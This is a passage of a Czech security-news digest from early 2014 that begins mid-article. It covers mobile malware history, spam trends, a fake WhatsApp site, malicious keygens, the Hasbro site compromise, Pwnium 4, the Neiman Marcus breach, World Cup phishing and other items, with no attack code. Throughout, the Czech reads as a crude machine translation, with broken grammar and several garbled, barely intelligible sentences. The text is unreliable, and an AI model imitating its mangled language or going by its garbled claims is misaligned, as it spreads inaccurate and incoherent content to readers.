odvozené od PC malware. Zitmo, Zeus v Mobile, byl první známý prodloužení Zeus, vysoce virulentní bankovnictví Trojan byl vyvinut pro PC světě. Práce ve spojení s Diem, Zitmo je hybnou silou, zločinci, aby se vyhnula používání SMS zpráv v on-line bankovních transakcí, a tím k obcházení zabezpečení procesu. Tam byl jiný malware v titulcích i v letošním roce, především Geinimi. Geinimi byl jedním z prvních malware navržen tak, aby útok na platformu Android a pomocí infikovaných telefon jako součást mobilní botnet. Po instalaci do telefonu, to by komunikovat se vzdáleným serverem a reagovat na širokou škálu příkazů - např. instalací nebo odinstalováním aplikací -. Který umožnil, aby efektivně převzít kontrolu nad telefonem "Zatímco zavedení mobilního malwaru pro Android a mobilní botnety byly jistě významné události v průběhu roku 2010, byly zastíněny rostoucí přítomností organizovaných zločinci, kteří začali využívat ekonomickou hodnotu mobilní malware, "řekl Apvrille. 2011: Android, Android a ještě Android s útoky na Android platformy zintenzivnění, silnější malware se začaly objevovat v roce 2011. DroidKungFu, například, se objevil s několika unikátními vlastnostmi, a dokonce i dnes je považován za jeden z nejvíce technologicky vyspělých virů v existenci. Malware včetně dobře-známý využít na "root" nebo se stát správcem telefonu - udev nebo Rage Against The Cage - což je úplnou kontrolu zařízení a schopnost kontaktovat příkazový serveru. To byl také schopný se vyhnout detekci anti-virus software, první bitva v probíhající válce mezi zločinci a anti-virus vývojářské komunity. Stejně jako u většiny virů před tím, DroidKungFu byl obecně dostupné od neoficiálních app obchodech a na fórech třetí strany v Číně. Plankton také přišel na scénu v roce 2011 a je stále jedním z nejrozšířenějších Android malware. Dokonce i na Google Play, oficiální Android apps store, Plankton se objeví ve velkém množství aplikací jako agresivní verze adware, stahování nevyžádané reklamy na telefonu, mění domovskou stránku mobilního prohlížeče nebo přidání zprávy zkratky a záložky na mobilní uživatele telefon. "S planktonu, budeme nyní hrát v první lize! Plankton je jedním z top 10 nejčastějších virů v rámci všech kategorií tím, že by ve stejné lize jako top PC viry, "dodal Apvrille. "Dny mobilní malware, které zaostávají za svými PC protějšky, jsou pryč. V současné době existuje více než 5 milionů zařízení infikovaných Plankton sám. " 2013: Hra na - nových způsobů útoku 2013 znamenal příchod FakeDefend, první ransomware pro Android mobilní telefony. V přestrojení jako antivirus, tento malware funguje podobným způsobem jako na falešný antivirus na počítači. Zaklapne telefon a vyžaduje, aby oběť zaplatit výkupné (ve formě přehnaně vysoké antivirovým paušálního poplatku, v tomto případě), aby bylo možné načíst obsah zařízení. Nicméně, platit výkupné nijak opravit telefon, který je třeba resetovat do továrního nastavení, aby se obnovila funkčnost. To bylo také v roce 2013, že Chuli poprvé objevil. Chuli malware byl považován za první cílený útok na platformě Android. Počítačoví zločinci za útokem zadlužuje e-mailový účet a aktivista na Světové ujgurské konference, která se konala March 11-13, 2013 v Ženevě, zaměřit se na účty jiných tibetského aktivisté za lidská práva a obhájci. E-maily odeslané z pirát účtu včetně CHULI jako přílohu, kus malware určený ke sběru dat, jako jsou příchozí SMS, SIM karty a telefonu kontakty, informace o umístění a nahrávky telefonních hovorů obětí. Zachycená informace pak byly odeslány na vzdálený server. "2013 je možno považovat rok mobilních útoky" profesionálem, "řekl Apvrille. "Stále více cílené a sofistikované, malware, jako FakeDefend nebo Chuli jsou příklady útoků srovnatelné známe dnes v PC světě. Kromě toho, že je to naprosto rozumné se zeptat, zda útok jako Chuli je ohlašovat nás do éry mobilních kybernetické války a začátek potenciálních postižením s vládami a dalšími národními organizacemi. " Co bude dál? Díky počítačové trestné činnosti, je vždy obtížné předpovědět, co se bude dít příští rok, a ještě více tak v průběhu příštích 10 let. Krajina mobilních hrozeb se dramaticky změnila v posledních deseti letech a cybercriminal komunita stále najít nové a stále důmyslné způsoby použití těchto útoků pro jeden jediný účel -. Vydělávání peněz však, s explozí chytrých telefonů a dalších mobilních technologií, přiměřené Predikce je konvergence mobilních a PC malware. Jako všechno, co se stane "mobilní", všechny malware pak bude "mobile". Kromě mobilních zařízení, s největší pravděpodobností budoucí cíl pro zločinci je internet věcí (internetu věcí). Zatímco velmi obtížné odhadnout počet připojených objektů na trhu v příštích pěti letech, Gartner odhaduje 30 miliard objekty budou připojeny v roce 2020, zatímco IDC odhaduje, že trh je 212000000000. Stále více a více výrobců a poskytovatelů služeb se vydělávat na obchodní příležitosti předložila těchto objektů, ale to je rozumné předpokládat, že bezpečnost nebyla dosud vzata v úvahu v procesu vývoje nových produktů. Bude internetu věcí bude "The Next Big Thing" pro cybercriminal?
Finanční údaje vede nebezpečný spam hit seznam
2.2.2014 Bezpečnost
Podíl nevyžádané pošty v e-mailovém provozu nadále klesá - v posledních třech letech se podíl nevyžádaných zpráv klesla o 10,7 procentních bodů. Zdá se, že inzerenti stále dávají přednost různé druhy zákonné on-line reklamy, které jsou nyní k dispozici a které generují vyšší odezvy při nižších nákladech než spam může nabídnout.
Kriminalizace spamu
V některých spam kategoriích reklamní se postupně odsunut trestné zásilek, jako jsou spamy reklamní nelegální zboží nebo pornografii. Typickým příkladem je Cestování a cestovní ruch kategorie, která slouží k účtu na 5-10% veškeré nevyžádané pošty provozu. V těchto dnech, komerční reklamy tohoto typu jsou vzácné, ale odborníci vidět mnoho škodlivých e-mailů aktivně využívat předmět cestování a volný čas. Falešné zprávy antivirus dodavatelů To je obyčejné pro IT bezpečnostní odborníci doporučují, aby uživatelé pravidelně aktualizovat své antivirové řešení, a to je něco, co se zločinci snažili využít v roce 2013. V e-maily, které se zdají být zaslány známých antivirových výrobců, jako jsou společnosti Kaspersky Lab, McAfee, ESET, Symantec atd., které vyzval uživatele, aby aktualizovali své systémy okamžitě pomocí přiloženého souboru. Příloha Ukázalo se, že obsahuje trojského koně z nechvalně proslulé Zeus / Zbot rodiny, který je navržen tak, aby krást citlivá uživatelská data, zejména finanční informace. Darya Gudkova, vedoucí obsahové analýzy na společnost Kaspersky Lab, poznamenal: "Již třetí rok v řadě nejrozšířenější malware šíří prostřednictvím e-mailu jsou programy, které se pokusily ukrást důvěrné údaje, obvykle přihlašovací jména a hesla pro internetové bankovnictví. Současně, nicméně, phishing útoky přesouvají z bankovních účtů na sociálních sítích a e-mailu. To lze částečně vysvětlit tím, že dnešní e-mailové účty často poskytnout přístup k hodně obsahu, včetně e-mailu, sociálních sítí, instant messaging, cloud skladování a někdy dokonce i kreditní kartou ". "šedý" korespondenci: obcházet spamové filtry V Nabídka pro dosažení ještě větší počet uživatelů, ale pozor na spam filtry, které blokují nežádoucí zprávy, inzerenti se uchylují k podvodu. Část hromadnou korespondenci je zaslána účastníkům, kteří souhlasili přijímat reklamy, a část je poslán na adresy získané z obrovských databází tyto společnosti si koupili -. Lidem, kteří nikdy dali svůj souhlas, aby takové zprávy dostávat Pokud jsou zásilky blokovány spam filtry, inzerenti obraťte se na dodavatele bezpečnostní a snaží se dokázat, jejich korespondence jsou legitimní tím, že ukazuje na webové stránky, kde uživatelé se zaregistrovat a můžete odhlásit kdykoliv. Toto představuje novou výzvu pro anti-spam průmyslu a vede k vývoji nových technologií založených na odesílatele pověst. Kde je spam pocházejících z? Asie představovaly 55,5% světové spamu v roce 2013 (nárůst o 5,3 procentního bodu v porovnání až 2012), po němž následuje Severní Amerika s 19% (+ 3,2 bodu). Podíl ve východní Evropě téměř zdvojnásobil ve srovnání s předchozím rokem, umístění regionu na třetím místě s 13,3%. Západní Evropa zůstává na čtvrtém místě, a to i přes pokles o 2,4 procentních bodů, zatímco podíl Latinské Ameriky na pátém místě činil k trojnásobnému poklesu oproti roku 2012.
Falešnou WhatsApp místo doručuje polymorfní SMS Trojan
2.2.2014 Mobil | Viry
Více populární on-line služba nebo aplikace je, tím větší je pravděpodobnost tato popularita bude zneužita cyber podvodníci oklamat uživatele do stahování malware či sdílení osobních a finančních informací. Rostoucí popularita služby instant messaging WhatsApp je dokonalým příkladem, jak počítačoví zločinci po celém na světě se neustále zřídit systémy zneužití služba je dobré postavení. Nejnovějším příkladem, všiml výzkumníky Malwarebytes ', přichází v podobě webové stránky nabízející aplikace pro rusky mluvící uživatele.
Tato stránka je spoof oficiálních stránkách dané služby, a vypadá docela přesvědčivý. Je to zřejmě nabízí verze aplikace pro iOS, Android, Nokia, Windows Phone a BlackBerry. V tomto případě pouze uživatelé s zařízení se systémem Android jsou v ohrožení, protože nabízené aplikace je vlastně Android SMS Trojan. Po instalaci na zařízení, malware začne vysílat pricy textové zprávy na číslo pojistné sazby. "Trojan sám byl asi na chvíli, ale malware autoři servírují polymorfní soubory, které se mění s každou návštěvou," poznamenal vědci . "Změny zahrnují řetězce, jako je třídách název balíčku a java. Celková kód a datový tok zůstává stejný. Tato taktika není nutně zaměřen na uživatele, ale vyhnout se detekci AV dodavatelů.
Dejte si pozor na škodlivé specializovaných softwarových keygeny!
2.2.2014 Viry
Maškarádu malware jako klíčové generátory populárních her je dobře známý malware, dodávka taktika, ale není to často, že vidíte škodlivé keygens pro jiné typy softwaru. Nicméně, to se stává občas. Výzkumníci Trend Micro varuje, že v posledních několika týdnech, malware trhovců byly zaměřené odborníky, kteří pracují v různých průmyslových odvětvích s tímto přístupem. Oni našli falešné generátory pro specializované (a drahé), strojírenství (AVEVA) a opravy automobilů softwaru (AllData), multimediální nástroje (Bigasoft), benchmarking software (Geekbench), software pro chemiky a biology (CambridgeSoft), výpočetní software (Wolfram Mathematica), a, ano, některé hry. Bohužel, nabízené spustitelné soubory nejsou tím, čím se zdají být. Jakmile se nainstalují, připraví cestu pro další škodlivý software, který bude instalován na ohrožení počítače, a v poslední době, že software je často falešný AV varianta. "Fake antivirový software, který výrazně snížil z jeho rozkvětu před několika lety (částečně kvůli zásahy na jejich platební systémy), "výzkumníci zdůraznil . "Od té doby, to bylo zastíněno první policejní ransomware a pak ve více nedávných měsících od CryptoLocker.
Webové stránky Hasbro ohrožena, slouží malware
2.2.2014 Viry
Oficiální internetové stránky dobře-známý výrobce hraček Hasbro byl kompromitován a našel slouží malware na nic netušící návštěvníky na několika příležitostech během posledních několika týdnů. Podle Barracuda Labs výzkumné pracovníky, místo nebylo ohroženo přes škodlivé reklamy, jak je to často případ , ale přímo, a to povede návštěvníky přes řetězce přesměrování na webové stránky hosting Java využije. Pokud je počítač návštěvníka se ukázalo být náchylné k nim, download informačního krádež Trojan varianta, která byla zpočátku není detekován některý z AV řešení používané VirusTotal. Uživatelé, kteří navštívili stránky 10. ledna, 11, 14 a 20 pravděpodobně měl jejich počítače infikované, tak oni jsou vyzýváni, aby skenovat svůj stroj s jedním z AV řešení, která detekují malware v otázce . , ale aby se na bezpečné straně, každý, kdo navštívil stránky v poslední době by to dobře, aby tak učinily také. Vyhnout webové stránky v současné době může také není špatný nápad, jak jsme čekat na své operátory čistý dům.
Rozvojové země jsou více ochotni obchodovat soukromí pro bezpečnost
2.2.2014 Bezpečnost
Společnost Microsoft zveřejnila výsledky globálního průzkumu, který se pokusil odpovědět na otázku, jak se lidé na celém světě vidět technologii a jak osobní technologie změnila jejich životy. Zatímco tam jsou rozdílné názory mezi rozvinutým a rozvojovým světem, drtivá většina z více než 10000 dotazované osoby z 10 zemí uvedlo, že přijali osobní technologie, zejména na rozvíjejících se trzích, a vidět jej jako základ inovací a ekonomického postavení. Lidé dotazovaní v rozvojových zemích - zejména Brazílie, Rusko, Indie a Čína - se domnívají, že osobní technologie je vytvoření pracovních příležitostí a pomáhá most ekonomických rozdílů. Lidé v Číně také říci, že osobní technologie pozitivně ovlivněn osobní svobody více než lidé v jakékoliv jiné zkoumané zemi. Lidé v Indii říkají, že osobní technologie je zlepšení vzdělávání, zdravotnictví a zdravotní péče, a v Brazílii, osobní technologie, měl silný vliv na umění a kulturu. Ačkoli osobní Technologie byla viděna převážně jako pozitivní síly v rozvinutých i rozvojových zemích, tam byly obavy , která se zaměřila na osobní bezpečnost a bezpečnost, rodinných vazeb, a, co je nejdůležitější, soukromí. Zajímavé je, že průzkum zjistil, že rozvojové země jsou ochotny obchodovat soukromí pro bezpečnost. Indii, a to zejména, vidí národní bezpečnosti jako důležitější, že soukromí. Na druhém konci spektra, téměř 70 procent dotázaných německých uživatelů uvedlo, že by neměl obchodovat soukromí pro národní bezpečnost (klikněte na screenshotu pro zvětšení): I přes obavy o soukromí, nicméně, téměř tři čtvrtiny Rodiče po celém světě chtějí, aby jejich děti měly více, ne méně, přístup k osobním technologií. To platí zejména v rozvojových zemích, kde jsou rodiče především podporovat zvýšení přístupu k technologiím. Názory jsou smíšené v rozvinutých zemích, kde je více rodiče mají pocit, že by mělo být omezení přístupu technologie. Průzkum Microsoft byl proveden mezi 26 prosincem 2013, a 03.1.2014, a zkoumal 10.009 uživatelů internetu ve Spojených státech, Francii, Brazílii, Rusku, Číně, Indii, Japonsku, Německu, Mexiku a Turecku. Výsledky pak byly váženy na základě velikosti populace internetu v každé ze 10 zemí. Pro zjištění úplné šetření jít sem .
2700000dolar čekají úspěšné Pwnium 4 soutěžící
2.2.2014 IT
Google má opět tzv. bezpečnostních výzkumníků k účasti ve své výroční Pwnium soutěže naplánováno která se bude konat v CanSecWest bezpečnostní konferenci ve Vancouveru v polovině března.
Čtvrtý ročník hackerské soutěže bude stejně jako v loňském roce, se zaměřují na společnosti Chrome OS, a soutěžící budou bojovat o značných ceny. Soutěžící, kteří dokáží spustit prohlížeč nebo systém na úrovni kompromisu v hodnocení režimu nebo jako přihlášený uživatel , dodáno prostřednictvím webové stránky, vyhraje 110.000 dolar, a ti, kteří nesou náš kompromis s zařízení vytrvalosti ("trvalé Host-to-Host využívat" s prozatímní restartu, dodáno prostřednictvím webové stránky), získají v pohodě 150.000 dolarů. prize poolu je 2718280 dolarů celkem. "Novinkou letošního ročníku, budeme také uvažovat o významné bonusy k prokázání zvláště působivé a překvapivé využívat. Možné příklady zahrnují porazil kASLR, využívání poškození paměti v 64bitovém procesu prohlížeče, případně využívání jádra přímo od renderer proces, " vysvětlil Jorge Lucángeli Obes, bezpečnostní Google inženýr a Pwnium Ceremoniář. "Past Pwnium soutěžích se zaměřuje na Intel Chrome OS zařízení, ale letos vědci si mohou vybrat mezi ARM-based Chromebook, HP Chromebook 11 (WiFi ), nebo Acer C720 Chromebook (2GB WiFi), který je založen na Intel Haswell mikroarchitektuře. útok musí být prokázána proti jednomu z těchto zařízení se systémem pak-aktuální stabilní verzi Chrome OS. " Jako obvykle, vyhrát cenu, že bude muset dodat plné využití s důkladným vysvětlením o využívaných chyby. Veškerý software je součástí výchozí instalace může být použit jako součást útoku. Vědci přemýšlel o registraci musí do 10.03.2014 se rozhodnout. Pro více informací, podívejte se na oficiální pravidla pro soutěže
1,1 milionu postižených v Neiman Marcus porušení
2.2.2014 Incidenty
American store luxusní Oddělení řetězec Neiman Marcus konečně nabídl nějaké podrobnosti o porušení utrpělo během konce roku dovolenou. Není to tak zlé, jako Target porušení , ale je to špatné, nicméně.
"Zatímco soudní a trestní vyšetřování stále pokračují, víme, že škodlivý software (malware) byl tajně nainstalován na našem systému," uvedl generální ředitel společnosti Karen Katz. "Zdá se, že malware se aktivně pokoušel sbírat nebo" šrot "Údaje o platebních karet z 16.července 2013 do 30.října 2013. Během těchto měsíců, přibližně 1,1 milionu platebních karet zákazníků by mohla být potenciálně viditelná malware. K dnešnímu dni, Visa, MasterCard a Discover oznámily nám, že přibližně 2400 unikátních platební zákazník karet používaných v Neiman Marcus a Poslední obchody volání byly následně použity podvodu. " Společnost začala oznámením potenciálně postiženým zákazníkům, pro něž se mají adresy nebo e-mail, a kdo nakupoval s nimi mezi lednem 2013 a ledna 2014 a nabízí jeden volný rok úvěrového monitoringu a ochrany identity proti krádeži. Oni také vyzval své zákazníky na kontrolovat jejich výpisy z platebních karet pro podezřelé aktivity, a ujistil je, že pokud jsou hlášeny včas, budou společnosti vydávající kreditní karty uhradit peníze, které ztratili. Udělali Ujistěte se, že vědomí, že zákazníci, kteří nakupovali on-line don 't se zdají být ovlivněny, a že PINy, čísla sociálního pojištění a data narození nebyly ohroženy. nenasvědčuje tomu, že by společnost mohla utrpěli porušení přišel v polovině prosince, kdy se jejich obchodní procesor oznámeného jim neoprávněné činnosti platebních karet Následující zákazník nakoupí v jednom ze svých obchodů. porušují byla potvrzena 1. ledna, forenzní firmy, které najal. "Na základě informací, které máme k dnešnímu dni se zdá, že sofistikované, self-skrývání malware, který je schopen podvodně získat informace o platební kartě , byl aktivní v období mezi červencem 16 a 30 října 2013, "uvedli, ale řekl, že nejsou známy žádné spojení mezi jejich a Target porušení (ačkoli jiné zdroje říkají, že malware používá v obou porušení se zdá být stejná ). Nakonec dodal, že oni přijali řadu kroků, které obsahují situaci a ke zlepšení jejich bezpečnostních opatření.
Evropská komise spojí své síly s firmami, pro 250.000 školení a nových digitálních pracovních míst
2.2.2014 IT
Předseda Evropské komise José Manuel Barroso a viceprezident Neelie Kroes přinesl generálních ředitelů z celé globální ekonomiky spolu na Světovém ekonomickém fóru v Davosu dnes rozšířit úspěšný rok-staré koalici, která se bude vyznačovat digitální možnosti vzdělávání a pracovních příležitostí.
Davos prohlášení, které bylo dnes řečeno, předpokládá vytvoření 100 tisíc dalších stáží do konce roku 2015. Od března 2013 42 partnerských organizací byly vyplněny extra 2200 nových digitálních pracovních míst, 5277 další stáže a učňovské obory a dodává školení pro další 269.000 lidí, kteří splňují závazky, které učinily na velké koalice EU pro digitální zaměstnanost. Partneři patří Cisco, Google, Microsoft, Oracle, Samsung, SAP, Telefonica, a řadu průmyslu a občanské společnosti sdružení. Klíčovým cílem v 2014 rozšíření koalice bude zboží a maloobchodní odvětví, které se stále více závislé na pracovníky s . digitální dovednosti, a to i na obchod a továrních Předseda Komise Barroso uvedl: "Velká koalice pro digitální zaměstnanost využívá úspor z rozsahu, které máme na úrovni EU, aby kvalifikované lidi a inovativní zaměstnavatele dohromady. To je evropská integrace v praxi. . Apeluji na všechny ty, kteří dosud spojil, aby využily této příležitosti k pomoci Evropa řídit další revoluci informačních a komunikačních technologií " prohlásila místopředsedkyně Neelie Kroesová k tomu: "Potkávám tolik mladých lidí s iniciativou, kteří touží po příležitosti a vidím. . společnosti v zoufalé potřebě pracovníků s digitálními dovednostmi Koalice odpovídá dva spolu, a pomáhá tisícům lidí budovat své životy Změna život stojí za každou minutu a euro investované ".. Příklady:
11 grassroots koalice složené z místních samospráv, místní průmysl, služby zaměstnanosti, vzdělávací a sociální subjekty jsou ve vývoji. Národní koalice již byly zahájeny v Litvě, Rumunsku a Polsku a iniciativy probíhají v Rakousku, Bulharsku, Itálii, Řecku, Lotyšsku, Španělsku, Amsterdam metropolitní oblasti, a v Baskicku
Dva Masivní Otevřené On-line kurzy (MOOCs) pro vědu a technologie učitelů středních škol jsou nyní k dispozici zde
Microsoft zvýší počet stáží o 50% v průběhu tří let (dosažení 13,500 v roce 2013 - 2015
Rada evropských Profesionální informatiky společností (CEPIS) zahájila e-Competence Benchmark, nástroj k tomu, aby uchazečům o zaměstnání a zaměstnavateli, aby odpovídal své dovednosti proti tomu, co zaměstnavatelé hledají v cestě zaměstnavatelů hodit
University of Piraeus v Řecku vyvíjí one-stop-shop zmapovat potřeby průmyslových podniků, poskytují on-line kurzy (200 lidí vyškoleni tak daleko), a nabídku dohazování služby pro stážisty
V Bulharsku, Telerik Akademie vyškolila více než 7000 lidí, přes MOOCs
V Itálii, Didasca, Banda Larga e Menti akutní, vyškolil 3000 lidí a 1100 učitelů v lepších dovedností v oblasti IKT
YouRock se crowdfunded novou zaměstnatelnosti platformu pro mladé lidi v celé Evropě využívat své stávající činnosti pro vytváření obsahu on-line jako důkaz své skryté schopnosti a nadání.
Světový pohár: falešné vstupenky, falešné dárky, skutečné útoky
31.1.2014 Phishing | Viry
Bouře phishing a malware útoky s využitím téma Světového poháru pokračuje - před několika měsíci jsme zaznamenali několik škodlivých kampaní s tímto tématem. Pro zpestření útoky a přilákat více obětí, brazilské zločinci se rozhodli investovat své úsilí o šíření falešné dárky a podvodné webové stránky prodávající vstupenky na hry na velmi nízké ceny, jízdenky, které ve skutečnosti neexistují.
Útoky spustí, když uživatel dělá jednoduché vyhledávání na Google, hledá pro webové stránky, které prodávají vstupenky Světového poháru. Zlí hoši registrované podvodné domény fifabr.com , které se zobrazí mezi prvními výsledky jako sponzorovaný odkaz:
Podvodné webové stránky nabízejí vstupenky na brazilských her za cenu 70,00 dolarů:
Produkty Kaspersky blokuje několik podvodných domén denně, všechny z nich používáte téma Světového poháru. Takové útoky jsou zaměřeny zcela na brazilských uživatelů a zprávy obecně používají názvy místní kreditní karty, banky a velké obchody, atd.
Phishingových zpráv s podvodným dárky jsou stále běžné, stejně - některé nabízejí volné vstupenky, hotovost, nebo dokonce zdarma cestování:
"Gratuluji, jsi vítěz volnou vstupenku na mistrovství světa"
Chcete-li získat volnou vstupenku, že je nutné, aby všechny vaše osobní údaje a číslo své kreditní karty na podvodné webové stránky:
Neymar a Fuleco čekají na vaše data kreditní karty
Někteří protivníci mají také vytvořil falešný prozradí, že je platný i po hrách:
"Dáváme ceny po mistrovství světa" jen další podvodnou domény
Až do začátku her mnoho dalších útoků se mohou objevit - ale my jsme připraveni je blokovat. Neriskujte snaží koupit vstupenky na hry na neznámých místech - to je bezpečnější koupit na internetových stránkách FIFA , bude on-line prodej začíná 12. března 2014.
Black Gold, nebo černá díra v kapse
31.1.2014 Spam
Michail Chodorkovskij, bývalý šéf ruské ropné společnosti Jukos, byl nedávno propuštěn z vězení. Tam je spousta spekulací v Rusku, pokud jde o důvody pro jeho amnestie, zatímco bulvár po celém světě sledují ex-podnikatel na každém kroku. Pro "nigerijské" podvodníky, novinky byl použit jako základ pro příběh o tragédii, jehož jediným cílem je vytlačit peníze z důvěřivých uživatelů.
Podle "nigerijské" příběhu, celá skupina ruských ropných magnátů (nadsázka, která má ospravedlnit obrovskou sumu peněz uvedenou v příběhu) čelí soud na základě obvinění podvodu. Naštěstí pro příjemce, měli čas převést svůj majetek na svěřenecký účet u banky ve Velké Británii. A teď tajemný prostředníkem, pane Maharais zahanbit, žádá lidi, aby osobní bankovní účet, $ 50 milionů olej štěstí by mohla být převedena do. Samozřejmě, že záležitost je přísně důvěrné - Velká Británie a ruští úředníci by měli vědět o tom nic.
Propuštění Chodorkovského z vězení vyvolalo vlnu tvůrčí podvody ze strany těchto spisovatelů 'Nigerijci písmen "- tam může být žádné jiné vysvětlení pro tvrzení, že celá skupina ropných magnátů (spíše než jen jedna osoba), byla pravděpodobně vzhledem k 15-věta roku . Naštěstí, to usnadňuje rozpoznat podvod. Jednoduchý on-line vyhledávání bude rychle odhalí, že tam byly žádné masové zatýkání ruských oligarchů, a to $ 50 milionů je jen výplodem pana Maharais zahanbit fantazie - pokud vůbec, že vůbec existuje.
Olympijské hry: Made in China
31.1.2014 Spam
Čína je tradičně hlavním zdrojem spamu na světě, a dopisy od mnoha čínských výrobců, kteří produkují obrovské množství zboží, jsou neustále přítomny v spam provozu. V naší zprávě říjnu jsme se zmínili, že tyto zásilky jsou obvykle spojeny nějakým způsobem z nejpopulárnějších mezinárodních svátků. A když viděl, leden nemá opravdu žádné významné nejen mluvit, spammeři se obrátil na jiné významné události - nadcházející zimní olympijské hry v Soči. Například, některé sklad společnosti propaguje své služby tím, že řekne příjemce, že jejich služby jsou využívány Ruskem v rámci přípravy na Soči 2014 her.
V září 2013 Jacques Rogge oznámil, že Tokio bude hostit olympijské hry 2020. Zatímco Japonsko se slaví své vítězství, někteří rychle myslící čínští výrobci z průmyslu výroby silikonů vymyslel způsob, jak využívat zprávy k propagaci svých výrobků. Ve svých nevyžádaných zpráv, které blahopřál japonské občany a připojil pár fotek z vyhlášení obřadu v Buenos Aires. Oni podepsal svůj dopis tím, že nabízí produkovat celou řadu olympijských themed zboží.
Spammeři využívají mnoho různých triků, jak přilákat nové zákazníky, ale spolupracují s podniky, jako je tento, je vždycky riskantní. Nenechte se zmást tím, sliby, nebo odkazy na velkých jmen a událostí - žádný z těchto záruk bude skutečně dostávají kvalitní zboží nebo služby. Ve skutečnosti, že společnosti mohou dokonce ukázat, že podvody a zmizí beze stopy poté, co obdržela zálohovou platbu.
Většina zaměstnanců SMB ve strachu z krádeže identity na pracovišti
31.1.2014 Bezpečnost
Menší obchodní pracoviště se promění v mobilní povoleno, agilní, a uspokojující životní prostředí, ale jeden, kde pracovní síla je plně uvědomuje a obavy o ohrožení jejich osobních informací on-line, nezávislá studie, financovaná GFI Software odhalil. Slepý průzkum dotázaných 1119 respondentů, kteří pracují v organizacích se mezi dvěma a 99 zaměstnanců na všech aspektech práce v malých a středních podniků (SMB), z pracovní spokojenosti a názorů na vedení do stavu malé firmy IT poskytování a využívání sociálních médií. Studie zjistila, že zdravé 81% zaměstnanců SMB dotazovaných jsou spokojeni se svou prací celkově. Nicméně, i přes výše průměrné úrovně práce štěstí, stejné zaměstnanci také zaznamenal značné obavy z dopadů on-line zpracování má na své osobní bezpečnosti a bezpečnosti informací. Téměř šest z 10 respondentů (59%) uvedla, pokud by mohly snap prsty a odstraňte všechny své osobní informace z internetu, že by s odvoláním na obavy z krádeže identity jako primární motiv. Celkem 87% dotázaných přiznala, že se cítil v nebezpečí, že se stanou obětí krádeže identity nebo jiné trestné činnosti, při použití práce počítačových systémů a zařízení, které obsahuje 6%, který naleznete v části "velké" rizika a 37%, kteří vnímají "některé "riziko. Mezi pracovníky na malé a střední podniky, které mají IT podporu na zaměstnance nebo na smlouvy, pouze 53% uvedlo, že jejich společnost zdokumentovány zásady, kterými se řídí používání firemních vlastnictví IT zařízení a / nebo používání počítačů na pracovišti. Ještě více překvapující, 24%, kteří mají zdokumentovány zásady v místě přijaty k jejich porušení, což bude dalším obavám z bezpečnosti IT a bezpečnosti pro všechny zaměstnance. studie GFI také odhalila, že navzdory mnoha menších organizací, agresivně, kterými se přijímají technologií, nástrojů a pracovních postupů svých větších rivalů, 75% dotázaných věří, mobilní výpočetní techniky se zlepšila jejich rovnováhu mezi pracovním a / život a pomohl pracovní síla jejich organsation stávají pružnější, na rozdíl od 25%, který řekl, že učinil život více stresující, protože to prodlužuje délku pracovní . den a odstraňuje propast mezi prací a osobním času Další zjištění z této zprávy jsou:
Téměř všichni respondenti se zaměstnavatelem ve vlastnictví mobilních výpočetních zařízení uvedlo, že používat na věci, které se netýkají práce, 22% uvedlo, že tomu tak často, 38% občas a 30% zřídka
37% zaměstnanců malých podniků uvedlo, že používají Facebook alespoň jednou denně
7% přiznalo, že se v určitém okamžiku ztratil mobilní výpočetní zařízení, která obsahovala údaje o společnosti
Pouze 36% respondentů uvedlo, že počítače jejich zaměstnavatele jsou nastaveny tak, aby jim blokovat návštěvě určité webové stránky.
Hacker Guccifer zatčen v Rumunsku?
31.1.2014 Kriminalita
Rumunský člověk věřil, že je (v) slavný hacker Guccifer byl zatčen ředitelství rumunského pro vyšetřování organizovaného zločinu a terorismu (DIICOT) ve středu.
Tisková zpráva ( pomocí Google Translate ) vydaného agenturou v důsledku zatčení uvedeny pouze iniciály zadržené muže - LML - ale říkal, že on byl podezřelý z opakovaně a bez povolení má přístup k e-mailové účty, které patří do veřejného života v Rumunsku , přístup k důvěrné e-maily a přenést je do svého počítače, pak se změnil hesla účtů. On také byl obviněn z prozrazení některých to shromážděny informace pro veřejnost, aby k poškození dobrého jména dotčených osob. náznak, že muž v otázce může být "Guccifer" spočívá v tvrzení, že americké úřady pomohl při vyšetřování. Jak si možná vzpomínáte, Guccifer se cílené on-line účty, mimo jiné, na šéfa amerického Národním úřadem pro jadernou bezpečnost , se Bush rodinu a Sex autor Město Candace Bushnell . Tisková zpráva také uvádí, že zatčený muž byl dříve zatčen za podobné trestné činy. rumunský novinky výstup Gandul.info ( via Google Translate ) se vykopali více informací o zatčen člověk, jmenoval jej jako jeden Marcel Lazarus Lehel. Soudě podle popisu jeho modus operandi v jeho 2011 útoků, policie Zdá se, že se dostali do pravého muže.
Motivace a techniky světově nejvíce sofistikovaných kybernetických útočníků
31.1.2014 Kriminalita
CrowdStrike vydala "CrowdStrike Globální hrozby Zpráva: 2013 Rok v přehledu," produkt jeho celoročního studia o více než 50 skupin aktérů počítačové hrozby.
Stránka zpráva 30-plus nabízí pohled na činnosti několika sofistikovaných skupin útočníků, včetně:
Deadeye JACKAL, obyčejně známý jako syrské elektronické armády (SEA);
Číslované Panda, skupinu Čína na bázi útočníků, kteří prováděli řadu kopí phishingových útoků v roce 2013;
MAGIC kotě, založena skupina kybernetických útočníků se sídlem v Íránu, který se provádí na několika kampaních v roce 2013, včetně série útoků zaměřených politických disidentů a těmi, kdo podporují íránskou politickou opozici;
ENERGETICKÁ BEAR, skupina rusko-založená společnost, která shromažďuje zpravodajské informace o energetice a
Vyslanec PANDA, herec Čína-založená společnost, která se zaměřuje na zahraniční velvyslanectví shromažďovat údaje o vládních, obrany a technologických odvětvích.
Nabízí také podívat na některé z nejpopulárnějších taktiky a techniky pro porušení obranu cílené organizace těchto útočníků. Například zpráva nabízí podrobnou analýzu toho, jak se několik organizovaných skupin hrozeb pomocí strategického web kompromis (SWC) - někdy tzv. "zalévání díry" - proniknout do cíle tím, že nakazí webové stránky nejčastěji surfovali svých členů. . SWC útoky na Radu pro zahraniční vztahy, amerického ministerstva práce, a několik zahraničních velvyslanectví jsou podrobně popsány ve zprávě "Organizace potřebují, aby se zpravodajskou řízený přístup k bezpečnosti - aktivně responding až po pokročilé hrozby podle priorit své omezené zdroje, "řekl George Kurtz, výkonný ředitel / prezident a spoluzakladatel CrowdStrike. "Informace v této zprávě umožňuje bezpečnostním profesionálům rozlišovat mezi cílenými a komodit útoků, čímž se šetří čas a zaměřit se na nejkritičtější ohrožení podniku." "S touto zprávou, jdeme nad rámec tradiční" zprávy o ohrožení " že prostě analyzuje malware trendy, "řekl Dmitrij Alperovitch, spoluzakladatel a CTO CrowdStrike. "Tato zpráva se zaměřuje na to, co je nejdůležitější - 